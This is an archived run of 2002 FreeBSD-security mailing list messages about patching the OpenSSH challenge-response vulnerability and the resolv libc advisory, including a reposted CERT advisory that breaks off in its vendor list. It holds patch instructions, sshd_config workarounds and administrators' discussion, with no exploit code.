19:22:05 -0600 Subject: Patching OpenSSH 4.5-Release From: Scott Gerhardt To: Message-ID: Mime-version: 1.0 Content-type: text/plain; charset="US-ASCII" Content-transfer-encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Patch Make error I get the following error followed the patch instructions as noted on by FreeBSD http://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-02:13.openssh. asc make: don't know how to make login_access.c. Stop The following patch has been verified to apply to FreeBSD 4.4-RELEASE, 4.5-RELEASE, and 4.5-STABLE dated prior to the correction date. It may or may not apply to older, unsupported versions of FreeBSD. Download the patch and the detached PGP signature from the following locations, and verify the signature using your PGP utility. # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:13/openssh.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:13/openssh.patch.asc Execute the following commands as root: # cd /usr/src # patch < /path/to/sshd.patch # cd /usr/src/secure/lib/libssh # make depend && make all # cd /usr/src/secure/usr.sbin/sshd # make depend && make all install # cd /usr/src/secure/usr.bin/ssh # make depend && make all install -- Scott Gerhardt, P.Geo. Gerhardt Information Technologies [G-IT] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:40:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id B792237DB7D for ; Wed, 26 Jun 2002 18:17:53 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5R1Hgw6019629; Wed, 26 Jun 2002 21:17:42 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 21:17:41 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Chris Knight Cc: freebsd-security@freebsd.org Subject: RE: Wow In-Reply-To: <012e01c21d6c$e16ce9c0$020aa8c0@aims.private> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 27 Jun 2002, Chris Knight wrote: > > If people want to do something useful, looking for nits in our > > integration of the new OpenSSH code in -CURRENT would be useful, as > > we're in the process of merging to -STABLE and catching the nits > > sooner rather than later would really be preferred. In particular, > > looking for any issues with PAM would be useful, and with non-default > > authentication types (hardware authentication tokens, kerberos, etc). > Isn't the merge a little bit hasty? According to the advisory, the least > intrusive change to -STABLE would be to uncomment the > ChallengeResponseAuthentication in /usr/src/crypto/openssh/sshd_config. > The PAM issues appear to only be in 2.9.9+. Also, my understanding of > the advisory is that the exploit hasn't been fixed - it's just that > Privilege Separation will limit the exploit to a chrooted environment > with minimal permissions. Please correct me if I'm wrong. There are several levels of response that we could take to this vulnerability. They include no action (bad idea), minimalist workarounds, minimalist corrective patches, and SSH upgrades. Now that the actual vulnerability information is available, we're in a much better position to make an informed decision--previously the only "known safe" activity was to perform a complete OpenSSH upgrade, since insufficient information was available to do a minimalist approach. - The *specific* vulnerability described in this advisory does not exist in the version of OpenSSH shipped in -STABLE. This means the most minimalist acceptable response would be to make no change at all, but an upgrade of OpenSSH is also possible. - The *specific* vulnerability described in this advisory does exist in the version of OpenSSH shipped in -CURRENT. Therefore we must make a change to -CURRENT, and that response was originally limited to "upgrade" but now could include more minimalist things. It's worth noting that the scope for "upgrade" has also expanded since the bug was originally pseudo-announced. The OpenBSD project has shipped two updates to OpenSSH lately: 3.3p, which made privilege seperation a functional reality on additional platforms, and 3.4 more recently, which actually fixes the specific bug. The OpenBSD Project held off on releasing 3.4 to permit more broad adoption of 3.3 and privilege seperation before providing specific information on the vulnerability. So here's where this leads me, anyway: - Upgrade FreeBSD 5.0 to OpenSSH 3.4. We upgraded to 3.3p immediately in response to the initial vulnerability report. We should now complete the upgrade process to bring it to 3.4 now that is available. This will move us from the "bug present but low impact" back into the "bug not present" category for that branch. - Upgrade FreeBSD 4.x-STABLE to OpenSSH 3.4. Although the specific vulnerability doesn't affect the specific version in -STABLE, we are aware that the model adopted by the older versions of OpenSSH is more prone to this sort of failure: that is, vulnerabilities resulting in privielge escalation. Given that more recent versions of OpenSSH have seen more extensive code review, and many "this is bad so fix it even though it might or might not be exploitable" types of commits, this seems like a logical direction once its stability has been demonstrated. We're in the process of working on this now. - For now, no change on the RELENG_4_X branches, adopting the most minimal safe approach avoiding suceptibility to all specifically published vulnerabilities. Once OpenSSH 3.4 is in -STABLE, evaluate its stability and functionality as a potential target for RELENG_4_X branches in the context of a non-specific security advisory (this might sound familiar to anyone watching the US news :-). Hope that we can do it in the form of a non-specific advisory as opposed to a specific one. In particular, it's worth noting that the proposed 'ChallengeResponseAuthentication' workaround actually has no security benefit in -STABLE [that I am aware of] due to when the bug was introduced in the OpenSSH branch. Therefore, other than for -CURRENT, this is not a useful work-around. Adopting the privsep model may well help us with future vulnerabilities in OpenSSH--something I think we can feel likely will exist at some point. I hope this sheds a bit of light on the strategy. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:41:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from hyperreal.org (taz3.hyperreal.org [209.133.83.22]) by hub.freebsd.org (Postfix) with SMTP id 9E3CA37D986 for ; Wed, 26 Jun 2002 18:06:48 -0700 (PDT) Received: (qmail 27133 invoked from network); 27 Jun 2002 01:06:46 -0000 Received: from localhost.hyperreal.org (HELO yez.hyperreal.org) (127.0.0.1) by localhost.hyperreal.org with SMTP; 27 Jun 2002 01:06:46 -0000 Received: (qmail 25709 invoked by uid 1000); 27 Jun 2002 01:08:45 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 27 Jun 2002 01:08:45 -0000 Date: Wed, 26 Jun 2002 18:08:45 -0700 (PDT) From: Brian Behlendorf To: Brett Glass Cc: freebsd-security@freebsd.org Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: <4.3.2.7.2.20020626143023.022716c0@localhost> Message-ID: <20020626180540.G310-100000@yez.hyperreal.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Spam-Rating: localhost.hyperreal.org 1.6.2 900/1000/N Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Brett Glass wrote: > At 01:26 PM 6/26/2002, H. Wade Minter wrote: > > >So am I correct in assuming that this fix requires a complete system > >rebuild (make buildworld) as opposed to just rebuilding a particular > >module? > > Worse than that. Every package or port must be reinstalled > or rebuilt too. Ditto everything you've built from source. > Basically, the entire system must be ripped up by the roots. Not as I understand it. It's just those programs that statically link in libc at compile time. And if you rebuild world, you only have to worry about packages/ports. After running file on every third-party executable on a couple systems I manage, only a few turned up as possible candidates; rebuilding them was pretty straightforward, except for bash2 and rpm whose ports don't appear to compile currently. I simply ran: find /usr/local/ -exec file \{\} \; | fgrep static to narrow down the search. Add other dirs you may install software in. Brian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:42:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from router.drapple.com (12-225-0-33.client.attbi.com [12.225.0.33]) by hub.freebsd.org (Postfix) with ESMTP id D895D37DA9A; Wed, 26 Jun 2002 18:14:31 -0700 (PDT) Received: from work.drapple.com (work [192.168.1.10]) by router.drapple.com (8.9.3/8.9.3) with ESMTP id SAA01036; Wed, 26 Jun 2002 18:15:10 -0700 (PDT) (envelope-from mark@work.drapple.com) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Wed, 26 Jun 2002 18:14:30 -0700 (PDT) From: Mark Hartley To: Robert Watson Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On 27-Jun-02 Robert Watson wrote: > > On Wed, 26 Jun 2002, Mark Hartley wrote: > >> Are there other common applications (not rebuilt by the world) that many >> of us are likely to be running which are going to need to be rebuilt >> (i.e. Apache, pop3 servers, db servers, etc)? >> >> I'm not really sure how to even know if an application would be >> statically linked against libc. Maybe someone with a clue could post >> some instructions on how to check out if an app is statically linked >> against libc, then we could test our own apps and rebuild as needed. >> Anyone have an easy way that we can tell? > > I just sent out some instructions in another mail, but the basic gist is > that you run the 'file' command on the binaries you're worried about, and > make sure they are dynamically linked. If the binary is statically > linked, or it's dynamically linked against an older libc, it will need to > be rebuilt. > > Assuming they dynamically link against the current (fixed) version of the > libc library, then restarting the application without rebuilding should be > sufficient. Note that if the daemon is actually *running* when you > replace libc, you'll need to restart it so it picks up the new library > version. It does no good to replace the daemon on disk, but have the > running version be the old one. > > Let me know if you have any questions. I figured the reboot of the whole system I did (after going through the whole build and install of kernel & world), should have taken care of making sure any dynamically linked stuff is using the new & improved libc. So far I've only found a few apps that didn't get rebuilt that appear to be statically linked, and most of them are Kerberos tools (not sure why they weren't rebuilt with world), but I don't use Kerberos or run any Kerberos services. So far, it appears that a cvsup and rebuild of world is all that I'm going to need to do. Kudos to the FreeBSD developers for making such a sweet system. Mark. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:43:56 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id E8B0C37B4AD for ; Wed, 26 Jun 2002 18:21:12 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5R1LBw6019650; Wed, 26 Jun 2002 21:21:11 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 21:21:10 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Mark Hartley Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Mark Hartley wrote: > I figured the reboot of the whole system I did (after going through the > whole build and install of kernel & world), should have taken care of > making sure any dynamically linked stuff is using the new & improved > libc. > > So far I've only found a few apps that didn't get rebuilt that appear to > be statically linked, and most of them are Kerberos tools (not sure why > they weren't rebuilt with world), but I don't use Kerberos or run any > Kerberos services. So far, it appears that a cvsup and rebuild of world > is all that I'm going to need to do. If you ended up with Kerberos installed somehow, it was probably an accidental flip of a switch in sysinstall. I make a habit of walking {/bin,/sbin,/usr/bin,/usr/sbin,/usr/libexec} after each installworld and trimming old and unused binaries. Especially for things like UUCP in -CURRENT, where the software presents some risk, and isn't going to get automatically garbage collected by the install process. I'd go through and check all the file modification dates in your binary directories and trim things you know you don't need just to reduce the chances of something slipping through the cracks. (Watch out not to delete old symlinks -- unlike binaries, their timestamps aren't updated during the install if they are still needed). Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 18:44:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 4CC4D37D6D9 for ; Wed, 26 Jun 2002 17:56:53 -0700 (PDT) Received: from fledge.watson.org (fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.12.3/8.12.3) with SMTP id g5R0upw6019460; Wed, 26 Jun 2002 20:56:51 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Wed, 26 Jun 2002 20:56:51 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Mark Hartley Cc: freebsd-security@FreeBSD.ORG, "H. Wade Minter" Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:28.resolv In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, 26 Jun 2002, Mark Hartley wrote: > Are there other common applications (not rebuilt by the world) that many > of us are likely to be running which are going to need to be rebuilt > (i.e. Apache, pop3 servers, db servers, etc)? > > I'm not really sure how to even know if an application would be > statically linked against libc. Maybe someone with a clue could post > some instructions on how to check out if an app is statically linked > against libc, then we could test our own apps and rebuild as needed. > Anyone have an easy way that we can tell? I just sent out some instructions in another mail, but the basic gist is that you run the 'file' command on the binaries you're worried about, and make sure they are dynamically linked. If the binary is statically linked, or it's dynamically linked against an older libc, it will need to be rebuilt. Assuming they dynamically link against the current (fixed) version of the libc library, then restarting the application without rebuilding should be sufficient. Note that if the daemon is actually *running* when you replace libc, you'll need to restart it so it picks up the new library version. It does no good to replace the daemon on disk, but have the running version be the old one. Let me know if you have any questions. Robert N M Watson FreeBSD Core Team, TrustedBSD Projects robert@fledge.watson.org Network Associates Laboratories To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 19: 0:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx7.roble.com (mx7.roble.com [206.40.34.7]) by hub.freebsd.org (Postfix) with ESMTP id AADBC37C66B for ; Wed, 26 Jun 2002 18:46:47 -0700 (PDT) Date: Wed, 26 Jun 2002 18:46:42 -0700 (PDT) From: Roger Marquis To: security@FreeBSD.ORG Subject: Legacy Static Linking (was: Security Advisory FreeBSD-SA-02:28.resolv) Message-ID: <20020626183519.F36946-100000@roble.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Robert Watson wrote: >You will catch most applications simply by rebuilding libc and >reinstalling. Unfortunately, some applications are statically linked, and >they must be individually relinked against the new libc and reinstalled. This makes a good case for doing away with static linking of system binaries. Why does FreeBSD have statically linked binaries? Static binaries were originally compiled because the libraries under /usr had to be mounted from a network filesystem or second disk and were not always available on boot. Since 1GB and larger SCSI hard drives became generally available (~1992) there has not been a compelling need to split /usr onto another disk/partition and, by extension, there has not been a real need for statically linked binaries. The track record of Unix and non-Unix operating systems which no longer ship with statically linked binaries is evidence they are no longer necessary. IMHO, -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 19: 2:38 2002 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 4849D37E3E0 for ; Wed, 26 Jun 2002 18:49:49 -0700 (PDT) Received: by flood.ping.uio.no (Postfix, from userid 2602) id 0E4255362; Thu, 27 Jun 2002 03:49:47 +0200 (CEST) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: hawkeyd@visi.com Cc: freebsd-security@freebsd.org Subject: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down References: <200206261711.g5QHB9t00396@sheol.localdomain> From: Dag-Erling Smorgrav Date: 27 Jun 2002 03:49:45 +0200 In-Reply-To: <200206261711.g5QHB9t00396@sheol.localdomain> Message-ID: Lines: 10 User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/21.2 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org hawkeyd@visi.com (D J Hawkey Jr) writes: > Sorry to be so thick-headed, but between Mike and Jacques, the answer > to "Is 'OpenSSH_2.9 FreeBSD localisations 20020307' even vulnerable?" > is "That does appear to be the case.". 2.9 is not vulnerable to this particular attack. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 19: 6:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by hub.freebsd.org (Postfix) with ESMTP id 1E60837B427 for ; Wed, 26 Jun 2002 19:00:57 -0700 (PDT) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 2453249A2; Wed, 26 Jun 2002 21:00:56 -0500 (CDT) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id g5R20tC02083; Wed, 26 Jun 2002 21:00:55 -0500 (CDT) (envelope-from hawkeyd) Date: Wed, 26 Jun 2002 21:00:55 -0500 From: D J Hawkey Jr To: Dag-Erling Smorgrav Cc: freebsd-security@freebsd.org Subject: Re: NUTS! "Much ado about nothing" -- I need a clearer up or down Message-ID: <20020626210055.A2065@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <200206261711.g5QHB9t00396@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from des@ofug.org on Thu, Jun 27, 2002 at 03:49:45AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Jun 27, at 03:49 AM, Dag-Erling Smorgrav wrote: > > hawkeyd@visi.com (D J Hawkey Jr) writes: > > Sorry to be so thick-headed, but between Mike and Jacques, the answer > > to "Is 'OpenSSH_2.9 FreeBSD localisations 20020307' even vulnerable?" > > is "That does appear to be the case.". > > 2.9 is not vulnerable to this particular attack. That's as simple as it gets. Thanks. > DES > -- > Dag-Erling Smorgrav - des@ofug.org Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 26 19:24:37 2002 Delivered-To: freebsd-security@freebsd.org Received: from energistic.com (bdsl.66.12.217.106.gte.net [66.12.217.106]) by hub.freebsd.org (Postfix) with ESMTP id E928F37B405 for ; Wed, 26 Jun 2002 19:23:11 -0700 (PDT) Received: from energistic.com (smmsp@localhost [127.0.0.1]) by energistic.com (8.12.4/8.12.3) with ESMTP id g5R2NAeU064735 for ; Wed, 26 Jun 2002 21:23:10 -0500 (EST) (envelope-from steve@energistic.com) Received: (from root@localhost) by energistic.com (8.12.5/8.12.4/Submit) id g5R2NACo064271 for freebsd-security@freebsd.org; Wed, 26 Jun 2002 21:23:10 -0500 (EST) Received: from canaveral.red.cert.org (canaveral.red.cert.org [192.88.209.11]) by energistic.com (8.12.4/8.12.3) with ESMTP id g5R1NTeU043766 for ; Wed, 26 Jun 2002 20:23:30 -0500 (EST) (envelope-from cert-advisory-owner@cert.org) Received: from localhost (lnchuser@localhost) by canaveral.red.cert.org (8.9.3/8.9.3/1.12) with SMTP id TAA26516; Wed, 26 Jun 2002 19:05:52 -0400 (EDT) Date: Wed, 26 Jun 2002 19:05:52 -0400 (EDT) Received: by canaveral.red.cert.org; Wed, 26 Jun 2002 19:02:58 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2002-18 OpenSSH Vulnerabilities in Challenge Response Handling Original release date: June 26, 2002 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * OpenSSH versions 2.3.1p1 through 3.3 Overview There are two related vulnerabilities in the challenge response handling code in OpenSSH versions 2.3.1p1 through 3.3. They may allow a remote intruder to execute arbitrary code as the user running sshd (often root). The first vulnerability affects OpenSSH versions 2.9.9 through 3.3 that have the challenge response option enabled and that use SKEY or BSD_AUTH authentication. The second vulnerability affects PAM modules using interactive keyboard authentication in OpenSSH versions 2.3.1p1 through 3.3, regardless of the challenge response option setting. Additionally, a number of other possible security problems have been corrected in OpenSSH version 3.4. I. Description Two related vulnerabilities have been found in the handling of challenge responses in OpenSSH. The first vulnerability is an integer overflow in the handling of the number of responses received during challenge response authentication. If the challenge response configuration option is set to yes and the system is using SKEY or BSD_AUTH authentication then a remote intruder may be able to exploit the vulnerability to execute arbitrary code. This vulnerability is present in versions of OpenSSH 2.9.9 through 3.3. An exploit for this vulnerability is reported to exist. This vulnerability is partially described in a recent ISS security advisory available at http://bvlive01.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=20584 The second vulnerability is a buffer overflow involving the number of responses received during challenge response authentication. Regardless of the setting of the challenge response configuration option, systems using PAM modules that use interactive keyboard authentication (PAMAuthenticationViaKbdInt), may be vulnerable to the remote execution of code. At this time, it is not known if this vulnerability is exploitable. Both vulnerabilities are corrected by the patches in a recent OpenSSH security advisory available from http://www.openssh.com/txt/preauth.adv Both vulnerabilities exploit features present only in version 2 of the SSH protocol. Vulnerability Note VU#369347 lists the vendors we contacted about this vulnerability. The vulnerability note is available from http://www.kb.cert.org/vuls/id/369347 II. Impact A remote attacker can execute code with the privileges of the user running the sshd (often root). These vulnerabilities may also be used to cause a denial-of-service condition. III. Solution Upgrade to OpenSSH version 3.4 These vulnerabilities are eliminated by upgrading to OpenSSH version 3.4, which is available from the OpenSSH web site at http://www.openssh.com OpenSSH version 3.4 will correct several other software defects with potential security implications not described in this advisory. Apply a patch from your vendor A patch for this problem is included in the OpenSSH advisory at http://www.openssh.com/txt/preauth.adv This patch may be manually installed with minor changes to correct these vulnerabilities in all affected versions of OpenSSH. Please note that applying the patches described in the OpenSSH advisory does not correct the other software defects with potential security implications not described in this advisory. If your vendor has provided a patch to correct these vulnerabilities, you may want to apply their patch rather than upgrading your version of sshd. System administrators may want to confirm whether their vendor's patch includes the other possible vulnerabilities corrected in OpenSSH 3.4. More information about vendor-specific patches can be found in the vendor section of this document. Because the publication of this advisory was unexpectedly accelerated, statements from all of the affected vendors were not available at publication time. We will update this document as vendors provide additional information. Disable SSH protocol version 2 Since both vulnerabilities are present only in protocol version 2 features, disabling version 2 of the protocol will prevent both vulnerabilities from being exploited. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: Protocol 1 This option may set to "2,1" by default. System administrators should be aware that disabling protocol version 2 may prevent the sshd daemon from accepting connections in certain configurations. Applying one or both of the configuration changes described below may be a less disruptive workaround for this problem. Disable challenge response authentication For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code by setting the "ChallengeResponseAuthentication" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: ChallengeResponseAuthentication no This option may be enabled (set to "yes") by default. This workaround should prevent the first vulnerability from being exploited if SKEY or BSD_AUTH authentication is used. It will not prevent the possible exploitation of the vulnerability via PAM interactive keyboard authentication. Disable PAM authentication via interactive keyboard For OpenSSH versions greater than 2.9, system administrators can disable the vulnerable portion of the code affecting the PAM authentication issue by setting the "PAMAuthenticationViaKbdInt" configuration option to "no" in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: PAMAuthenticationViaKbdInt no This option may be disabled (set to "no") by default. This workaround should prevent the second vulnerability from being exploited if PAM interactive keyboard authentication is used. It will not prevent the possible exploitation of the vulnerability via SKEY or BSD_AUTH authentication. Disable both options in older versions of OpenSSH For OpenSSH versions between 2.3.1p1 and 2.9, system adminstrators will instead need to set the following options in their ssh configuration file: KbdInteractiveAuthentication no ChallengeResponseAuthentication no Setting both of these options is believed to prevent the exploitation of the vulnerabilities regardless of which authentication mechanisms are used. Use privilege separation to minimize impact System administrators running OpenSSH versions 3.2 or 3.3 may be able to reduce the impact of this vulnerability by enabling the "UsePrivilegeSeparation" configuration option in their sshd configuration file. Typically, this is accomplished by adding the following line to /etc/ssh/sshd_config: UsePrivilegeSeparation yes This workaround does not prevent these vulnerabilities from being exploited, however due to the privilege separation mechanism, the intruder may be limited to a constrained chroot environment with restricted privileges. This workaround will not prevent these vulnerabilities from creating a denial-of-service condition. Not all operating system vendors have implemented the privilege separation code, and on some operating systems, it may limit the functionality of OpenSSH. System administrators are encouraged to carefully review the implications of using the workaround in their environment, and use a more comprehensive solution if one is available. The use of privilege separation to limit the impact of future vulnerabilities is encouraged. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments. Compaq Computer Corporation SOURCE: Compaq Computer Corporation, a wholly-owned subsidiary of Hewlett-Packard Company and Hewlett-Packard Company HP Services. Software Security Response Team x-ref:SSRT2263 At the time of writing this document, Compaq is currently investigating the potential impact to HP Tru64 UNIX, commercial version of SSH for V5.1a. As further information becomes available notice will be provided of the completion/availability of any necessary patches through standard product and security bulletin announcements and be available from your normal HP Services support channel. Caldera Caldera OpenLinux OpenSSH has neither the S/KEY nor BSD Auth features compiled in, so it is not vulnerable to the Challenge/Response vulnerability. We do have the ChallengeResponseAuthentication option on by default, however, so to be safe, we recommend that the option be disabled in the sshd_config file. In addition, the sshd_config PAMAuthenticationViaKbdInt option is off by default, so OpenLinux is not vulnerable to the other alleged vulnerability in a default configuration, either. However, Caldera recommends that this option be disabled if it has been enabled by the system administrator. Cray, Inc. Cray, Inc. has found the OpenSSH released in Cray Open Software 3.0 to be vulnerable. Please see Field Notice 5105 and spr 722588 for fix information. Debian Debian 2.2 (the current stable release) is not affected by these problems. The current versions of our "testing" distribution, to become Debian 3.0, and our "unstable" distribution, are both affected by default. We recommend that users be certain that both: ChallengeResponseAuthentication no and PAMAuthenticationViaKbdInt no are present and uncommented in /etc/ssh/sshd_config (and that the server is restarted). Also, we recommend the use of version 3.3p1, now available from security.debian.org (DSA-134). Stable users do not need to upgrade and may wish to wait until the packages have received better testing. We intend to provide 3.4p1 packages in the near future. Engarde Guardian Digital ships OpenSSH in all versions of EnGarde Secure Linux. Version 3.3p1 was introduced by ESA-20020625-015 on June 25, 2002. This update introduces privilege separation. All users are strongly urged to upgrade to this version as soon as possible. An upgrade to version 3.4p1 (which properly fixes the bugs) will be made available sometime in the next few days. Hewlett-Packard Company Hewlett-Packard provides a version of SSH: HP-UX Secure Shell (T1471AA) for HP-UX versions 11.00 and 11i. We are investigating to determine whether this product is vulnerable. IBM Corporation IBM's AIX operating system does not ship with OpenSSH; however, OpenSSH is available for installation on AIX via the Linux Affinity Toolkit. The version included on the CD containing the Toolkit is vulnerable to the latest discovered vulnerability discussed here as is the version of OpenSSH available for downloading from the IBM Linux Affinity website. Anyone running this version is advised to follow the recommendations above to limit their vulnerability. We working with the changes for version 3.4 and will have a new package availble for download as soon as possible. When available the new packages can be downloaded from: http://www6.software.ibm.com/dl/aixtbx/aixtbx-p This site contains Linux Affinity applications containing cryptographic algorithms, and new users of this site are asked to register first. Lotus Lotus products are not vulnerable to this problem. Mandrake Software MandrakeSoft released OpenSSH 3.3p1 in updates Monday night to mitigate this vulnerability. Updates to OpenSSH 3.4p1 will be available for download later this week. Microsoft Corporation Microsoft products are not affected by the issues detailed in this advisory. Network Appliance NetApp systems are not vulnerable to this problem. OpenBSD See http://www.openbsd.org/errata.html#sshd OpenSSH See http://www.openssh.com/txt/preauth.adv Process Software MultiNet, TCPware, and SSH for OpenVMS are not affected by the problems outlined in this advisory. RedHat Inc. Red Hat Linux versions 7, 7.1, 7.2 and 7.3 as well as Red Hat Linux Advanced Server version 2.1 ship with OpenSSH. The Red Hat Linux OpenSSH packages were not compiled with either BSD_AUTH or SKEY enabled, therefore in order to be vulnerable to this issue a user would need to have enabled the configuration option "PAMAuthenticationViaKbdInt" in their sshd configuration file (the default is disabled). We are continuing to investigate this vulnerability and will release updated packages where appropriate. SGI At this time, SGI does not ship OpenSSH as a part of IRIX. The OpenSSH privilege separation code 